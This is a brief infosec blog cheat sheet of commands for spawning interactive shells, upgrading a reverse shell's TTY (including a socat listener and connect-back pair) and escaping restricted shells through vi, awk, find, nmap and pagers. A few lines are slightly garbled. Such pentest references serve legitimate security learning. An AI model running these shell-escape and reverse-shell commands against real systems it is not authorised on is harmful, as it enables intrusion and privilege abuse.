Furrukh Taj

Infosec Enthusiast

Escaping & Spawning Interactive Shells

07 Nov 2018 » security, tty

Source: netsec.ws and ropnop

Shell Spawning

– Python:

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'

Or if we can upload a payload, better to use the following to get a proper interactive shell. Python PTY Shell

– Bash:

echo os.system('/bin/bash')
/bin/sh -i

– Perl:

perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";

– Ruby:

ruby: exec "/bin/sh"

– LUA:

lua: os.execute('/bin/sh')

– From within IRB

exec "/bin/sh"

– Inside vi:

:set shell=/bin/bash:shell

– Nmap <= 5.21:

nmap -V
nmap --interactive

– Socat:


socat file:`tty`,raw,echo=0 tcp-listen:4444


socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:  

– stty options:

In reverse shell

$ python -c 'import pty; pty.spawn("/bin/bash")'

In Kali

$ stty raw -echo
$ fg
press enter

In reverse shell

$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
sh -r 

bash -r
bash --restricted

ksh -r

Sans article

One of the most well documented techniques is to spawn a shell from within an editor such as ‘vi’ or ‘vim’. Open any file using one of these editors and type the following and execute it from within the editor:

:set shell=/bin/bash
:set shell=/bin/sh

Next, type and execute:


Another method is to type:

:! /bin/bash
awk 'BEGIN {system("/bin/sh")}'
find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

More, Less, and Man Commands There is a known escape within these commands. After you use the ‘more’, ‘less’, or ‘man’ command with a file, type ‘!’ followed by a command. For instance, try the following once inside the file:

'! /bin/sh'

Tee Command

echo "evil script code" | tee script.sh

More info on restricted shell found [here] (https://www.gnu.org/software/bash/manual/html_node/The-Restricted-Shell.html)